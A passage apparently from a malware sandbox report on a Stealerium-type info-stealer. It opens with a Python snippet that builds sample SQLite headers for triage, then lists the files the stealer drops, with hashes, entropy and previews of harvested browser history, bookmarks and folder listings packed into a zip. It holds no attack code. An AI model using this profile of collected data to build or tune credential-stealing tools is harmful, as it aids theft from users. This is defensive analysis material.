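

# Constructed samples: two records' header fields, then zero padding in place of pages.
SAMPLE_2048 = build_header(page_size=2048, sqlite_version=3035005, file_counter=2,
                           db_pages=56, cookie=0x24).ljust(114688, b"\x00")
SAMPLE_WAL = build_header(page_size=32768, sqlite_version=3042000, file_counter=2,
                          db_pages=46, cookie=0x26, user_version=75,
                          write_version=2, read_version=2).ljust(5242880, b"\x00")
```

`describe()` reproduces the File Type text of the first record and of the 5242880-byte record exactly, but it always prints the page size, whereas the scanner that produced the rows above omitted it for the 126976-byte record (whose 31 pages imply 4096-byte pages); the example does not try to replicate that tool's omission rules. Because the samples are zero-padded, their entropy is near zero, unlike the real dropped files, whose values (0.47 to 1.14 for the small ones) reflect actual table content; `triage()` on a real copy should be run on the bytes read from disk, and a `wal_mode` result means the accompanying -wal and -shm files are worth collecting from the same directory before drawing conclusions about what the stealer had access to.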
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):5242880
Entropy (8bit):0.037963276276857943
Encrypted:false
SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:C0FDF21AE11A6D1FA1201D502614B622
SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):159744
Entropy (8bit):0.7873599747470391
Encrypted:false
SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):121765
Entropy (8bit):7.940296951911145
Encrypted:false
SSDEEP:3072:S1AkejYEV4kluY48xWOiEJnDod9mLV5aiiBmwc65T:MezVLJx/JsrmnP6l
MD5:32A27034121055815BAC17AEF7FFE522
SHA1:D6D2740A80E937A2AE731EAA1EE31A9E179AC4E3
SHA-256:C00F72C224620264D2C307E886F21C0EEC6B474E27427B93363E92F659D25369
SHA-512:A7209FE1D6F5E990CAEFEB3BC2DE28013BD3EF619FD2075C44D78FF92E7D039845BB72B64FD2BBF1D59E6EC5B46050FFE8F44BAFB9A10AF1F2E058DC7804A46A
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: C:\Users\user\AppData\Local\cb60c5e88147715fe2ed1a9bb45bba55\user@724536_en-CH.zip, Author: Joe Security
                                                                                                                                                                                                                                                          Preview:PK........''}Y................Browsers/Edge/History.txt....+.C.(PK........''}Yq.C]t...........Browsers/Firefox/Bookmarks.txtU..0J..6..h..../....Z2T..d..B......c20.,.;.-..Q....o...|.....P..%..&.z.....R.9&.7w{mzUj. @..!......z....T.R....PK..q.C]t.......PK........''}Y...sl...^.......Browsers/Firefox/History.txt...={2.O...4.S.Zzb..xC^..b..r)Z....a..y.T.....g.X.a...?@\.y.1(..i.B6G.....jL..e....u....L.if......w..-...#PK.....sl...^...PK........''}Y................Browsers/Google/Downloads.txt..]d...68t.3PK........''}Y................Browsers/Google/History.txt......X....PK........&'}Y.y.....5.......Directories/Desktop.txt.hrD....b.[....A.........:...a...qOO....~.#P..S/G...../.~g.......3h.?F.Ki.K.CC. [..\......m-.N.M.......D.9k..d;..M..{..Y.. ..........._q7o]....M.\.....OE...GGxD{W.;...?.....P`.%.....g.W....G...+r.y`..(F....=JU..=5...w..K........aB.'5...v.A..uO.zVoPK...y.....5...PK........''}Y....(...........Directories/Documents.txt5$E...'..p.%.6w.{S.0y...B.mp...`..
Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type:ASCII text
Category:dropped
Size (bytes):220
Entropy (8bit):4.546534105739819
Encrypted:false
SSDEEP:6:Kw5FBeKjMnf3eKj5ZKMeKjYLC/eKjtyRE2YReK3:KCBH4n/HHKMHsL0HMRE2uH3
MD5:2AB1FD921B6C195114E506007BA9FE05
SHA1:90033C6EE56461CA959482C9692CF6CFB6C5C6AF
SHA-256:C79CFDD6D0757EB52FBB021E7F0DA1A2A8F1DD81DCD3A4E62239778545A09ECC
SHA-512:4F0570D7C7762ECB4DCF3171AE67DA3C56AA044419695E5A05F318E550F1A910A616F5691B15ABFE831B654718EC97A534914BD172AA7A963609EBD8E1FAE0A5
Malicious:false
Preview:Title: Get Help.URL: (No URL provided)..Title: Customize Firefox.URL: (No URL provided)..Title: Get Involved.URL: (No URL provided)..Title: About Us.URL: (No URL provided)..Title: Getting Started.URL: (No URL provided)..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):94
                                                                                                                                                                                                                                                          Entropy (8bit):4.890995272476094
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:qtNRROrSLvIJiMhKVX3L2WdXOfZiGPHA9lfMJJEv:MeGLciA8dXwZiG/CF0Ev
                                                                                                                                                                                                                                                          MD5:A72509876646BC379E1D8C3B895ED0ED
                                                                                                                                                                                                                                                          SHA1:2F270C6A8E07FA7FEE8C07A1FD100474A9A513A8
                                                                                                                                                                                                                                                          SHA-256:8BF712CABAC55E09FF74348817A29572826688AE4AB516848FE882BC5DEF91E7
                                                                                                                                                                                                                                                          SHA-512:FDCB7BB82C0AF434610311D7B12EB2D6AEF7ADB8B040EBA97D3F115C18810799EEDC02B39AF6992C15552568B5BC799889CC185191D5E783DEB82DC98946A5EB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:URL: https://www.mozilla.org/en-US/privacy/firefox/.Title: Firefox Privacy Notice . Mozilla.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):244
                                                                                                                                                                                                                                                          Entropy (8bit):5.087743120757909
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:Uqf7R5WzLVMz3eYeDPO+YtnJXQcOG4E2WzLVMz3eYeDPOCd4:UO2zGjeDDPOtnKcOHPWzGjeDDPO7
                                                                                                                                                                                                                                                          MD5:4C0A246FFF442FDA266D22D0038B1D16
                                                                                                                                                                                                                                                          SHA1:9EC99F882E0D4B9B9305AADBA1875F88CF7A740D
                                                                                                                                                                                                                                                          SHA-256:44F3AB1DC0DC9397D7CE58C447533146360F68AFD3114D22AAE5056B10EC0E24
                                                                                                                                                                                                                                                          SHA-512:6E1C3DB12EBAA416448581C24D7FB1DD7F34BBD1FB40E8657B8A8FEBA9653E99BCD31B599DC7CA52E31C5560ECEA8E40B73C7E6DE1362AFF459E59F5B18B6D8D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:URL: Examples of Office product keys - Microsoft Support.Title: https://go.microsoft.com/fwlink/?linkid=851546..URL: Install the English Language Pack for 32-bit Office - Microsoft Support.Title: https://go.microsoft.com/fwlink/?LinkId=2106243.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):565
                                                                                                                                                                                                                                                          Entropy (8bit):5.23585507185432
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:wvZ4gosmIcK7CNyhwNKVr8veeL7NUx7jWzoNaL78LKdPh9ZdndCkjDbxOeKFn:NgoRIckCiU7ux7jWz57rdPh9ZddCkjDo
                                                                                                                                                                                                                                                          MD5:43DC07E690B3AF6C26C7930D5347CB44
                                                                                                                                                                                                                                                          SHA1:07CABD6E9BF32D1BF2408AC97BB334F78E780FDD
                                                                                                                                                                                                                                                          SHA-256:902BB4ADAFED1F6542090A41FDE48578A2535EA7F98FBB0A74D470242ABCA77A
                                                                                                                                                                                                                                                          SHA-512:EAAFDC330723F8DB436558D740802F607DD70EA173120C238D3B7EBB61976CAF4430D1C88E23ADC9D0F1F863E4E7CB320C9222DE9B9FFFEA0C79276564491ED5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Desktop\...BPMLNOBVSB\...MXPXCVPDVN\...RAYHIWGKDI\...SQRKHNBNYN\...WUTJSCBCFX\....JSDNGYCOWY.jpg....KZWFNRXYKI.pdf....NIKHQAIQAU.mp3....WUTJSCBCFX.docx....YPSIACHYXW.xlsx....ZBEDCJPBEY.png...YPSIACHYXW\....CURQNKVOIX.png....JSDNGYCOWY.xlsx....NIKHQAIQAU.pdf....RAYHIWGKDI.jpg....YPSIACHYXW.docx....ZTGJILHXQB.mp3...CURQNKVOIX.png...desktop.ini...Excel.lnk...JSDNGYCOWY.jpg...JSDNGYCOWY.xlsx...KZWFNRXYKI.pdf...LKxcbzlwkz.exe...NIKHQAIQAU.mp3...NIKHQAIQAU.pdf...RAYHIWGKDI.jpg...WUTJSCBCFX.docx...YPSIACHYXW.docx...YPSIACHYXW.xlsx...ZBEDCJPBEY.png...ZTGJILHXQB.mp3..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):690
                                                                                                                                                                                                                                                          Entropy (8bit):5.341619461426153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:a4gosRPLKQ4wRLKTLKBLKMkLKTIcK7CNyhwNKVr8veeL7NUx7jWzoNaL78LKL9Z+:PgoJxrqEETIckCiU7ux7jWz57rL9ZdXA
                                                                                                                                                                                                                                                          MD5:09CE22A7968658943D601414355E5D70
                                                                                                                                                                                                                                                          SHA1:18C6E4A4076694B03561AFA3B50E9BF71D7F3D6A
                                                                                                                                                                                                                                                          SHA-256:8CF540C13811379E991CEFBC98A144ECB96F77B55640C8118D9F796E37B26AEF
                                                                                                                                                                                                                                                          SHA-512:632E7CB2B89EAE05D57FAD5A1308A365215587822733B3649821654EFF55057686DEAF5CE952E5A7EE0EEAA75C128472CE575AA93D1A4C6FB35D1AF736F370AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Documents\...BPMLNOBVSB\...MXPXCVPDVN\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...RAYHIWGKDI\...SQRKHNBNYN\...WUTJSCBCFX\....JSDNGYCOWY.jpg....KZWFNRXYKI.pdf....NIKHQAIQAU.mp3....WUTJSCBCFX.docx....YPSIACHYXW.xlsx....ZBEDCJPBEY.png...YPSIACHYXW\....CURQNKVOIX.png....JSDNGYCOWY.xlsx....NIKHQAIQAU.pdf....RAYHIWGKDI.jpg....YPSIACHYXW.docx....ZTGJILHXQB.mp3...CURQNKVOIX.png...desktop.ini...JSDNGYCOWY.jpg...JSDNGYCOWY.xlsx...KZWFNRXYKI.pdf...NIKHQAIQAU.mp3...NIKHQAIQAU.pdf...RAYHIWGKDI.jpg...WUTJSCBCFX.docx...YPSIACHYXW.docx...YPSIACHYXW.xlsx...ZBEDCJPBEY.png...ZTGJILHXQB.mp3..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):234
                                                                                                                                                                                                                                                          Entropy (8bit):5.23985794838707
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:3tkZL78LKKa9cadRdsd+eydsd+X/UobxudNrsNKL4kiBq:uZL78LKL9ZdXCkjDbxOeKFn
                                                                                                                                                                                                                                                          MD5:F0A648B2A721F1D4D9484A927FB5855C
                                                                                                                                                                                                                                                          SHA1:C7A5B28E6519E150CC5EE03B33B8ADF4D0FC39CA
                                                                                                                                                                                                                                                          SHA-256:0FB5F3705E2BFB07702C21504BBC2669F295E815F71636281B97607944659A8D
                                                                                                                                                                                                                                                          SHA-512:5F58C1DFF4CB7F51AD3F5C933516E446C21B86E834AAD11D2B7D84DF2B8D875D5F2FA09209C63A426A5304A9ABCD957F8690C8046856FEACA6F18859059D6BBB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Downloads\...CURQNKVOIX.png...desktop.ini...JSDNGYCOWY.jpg...JSDNGYCOWY.xlsx...KZWFNRXYKI.pdf...NIKHQAIQAU.mp3...NIKHQAIQAU.pdf...RAYHIWGKDI.jpg...WUTJSCBCFX.docx...YPSIACHYXW.docx...YPSIACHYXW.xlsx...ZBEDCJPBEY.png...ZTGJILHXQB.mp3..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):25
                                                                                                                                                                                                                                                          Entropy (8bit):4.023465189601646
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:1hiR8LKB:14R8LKB
                                                                                                                                                                                                                                                          MD5:966247EB3EE749E21597D73C4176BD52
                                                                                                                                                                                                                                                          SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                                                                                                                                                                                                          SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                                                                                                                                                                                                          SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:OneDrive\...desktop.ini..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):88
                                                                                                                                                                                                                                                          Entropy (8bit):4.450045114302317
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                                                                                                                                                                                                          MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                                                                                                                                                                                                          SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                                                                                                                                                                                                          SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                                                                                                                                                                                                          SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                          Entropy (8bit):4.053508854797679
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:jgBLKB:j4LKB
                                                                                                                                                                                                                                                          MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                                                                                                                                                                                                          SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                                                                                                                                                                                                          SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                                                                                                                                                                                                          SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Startup\...desktop.ini..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3980
                                                                                                                                                                                                                                                          Entropy (8bit):5.348110083710864
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:4jzcRPTmt6qESf/gbQg3dxQ0rbiGVis9kovvbwq:BtbSXGQwrQCOKeiMq
                                                                                                                                                                                                                                                          MD5:AF22E406FF6E495019D00B360329781B
                                                                                                                                                                                                                                                          SHA1:7E92FAC664D8AF8435BE0D0E76CEEF1EC6D7300F
                                                                                                                                                                                                                                                          SHA-256:486464C343997C152DF30DCD1FB1EE0FE1DB888C93A46A5303C23521CC2F3E62
                                                                                                                                                                                                                                                          SHA-512:2D307D3ADEFFB7334E999D120889F9DA3FCD3889E712C2692D7FDD649029C2F9AF28EB8D3EBBC3BA53DDE74D5098C539062058968952A1846701574D55C8084E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):23
                                                                                                                                                                                                                                                          Entropy (8bit):3.7950885863977324
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:k+JrLKB:k+JrLKB
                                                                                                                                                                                                                                                          MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                                                                                                                                                                                                          SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                                                                                                                                                                                                          SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                                                                                                                                                                                                          SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:Videos\...desktop.ini..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.688505748329201
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:fOpwMLhSm1UbWgtD1i0Sn1EcsITViZiFeEaf:gLhSGqP1vSn11l8ceTf
                                                                                                                                                                                                                                                          MD5:E791BC4BB488A2AE526214AB2CCF03F0
                                                                                                                                                                                                                                                          SHA1:FEBDEFE4D61586EE877A369BB31B4B92B19D5E2D
                                                                                                                                                                                                                                                          SHA-256:4EFC0B5E75E9B1A642F3BC4FACAE7C8F8C77DFAD5F6C0F3F2C807B3654576616
                                                                                                                                                                                                                                                          SHA-512:61EF6F62E86F65DA2E7CC9821DA2AD669C4AD62275A044153BCE247AB2FCCC938B7EB57C46099AB4A84909CEC5104FF5B95D12161C3D7AA353B79647122C15BB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690895772725941
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
                                                                                                                                                                                                                                                          MD5:A002E80B55673139253599B753BDC01A
                                                                                                                                                                                                                                                          SHA1:6AEEF831A5AAB9155AAABB52D173859E20A86932
                                                                                                                                                                                                                                                          SHA-256:F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
                                                                                                                                                                                                                                                          SHA-512:D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                                          MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                                          SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                                          SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                                          SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\JOUNLV.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
Entropy (8bit): 4.690394987545919
Encrypted: false
SSDEEP: 24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5: CA901F8E74EB7955CF06A00BD424C0C2
SHA1: 0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256: 6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512: 7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious: true

Process: C:\Users\user\AppData\Local\Temp\JOUNLV.exe
File Type: ASCII text, with very long lines (1024), with CRLF line terminators
Category: dropped
Size (bytes): 1026
Entropy (8bit): 4.69782189124949
Encrypted: false
SSDEEP: 24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5: 0640503E533EFB11CC70F43D2FFF4E26
SHA1: EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
